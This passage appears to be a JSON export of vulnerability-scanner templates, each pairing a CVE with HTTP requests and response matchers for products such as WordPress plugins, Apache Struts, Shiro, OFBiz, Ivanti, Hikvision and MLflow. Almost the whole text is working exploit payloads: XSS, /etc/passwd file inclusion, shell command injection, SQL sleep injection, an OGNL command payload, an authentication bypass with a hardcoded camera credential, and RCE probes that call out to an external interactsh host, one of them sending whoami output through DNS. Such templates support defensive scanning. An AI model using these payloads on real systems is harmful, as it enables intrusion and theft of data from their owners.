Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"\")","!contains(body_3, \"\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["master"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-2449","info":{"name":"Apache Tomcat 4.x-7.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp;test.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request URI: /examples/jsp/snp/snoop.jsp;test.jsp","JSP Request Method"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"build\")","contains(body_1, \"system-information\")","contains(body_1, \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"poll_interval\")","contains(body_2, \"block_message\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[">","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid
    "],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1="]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET 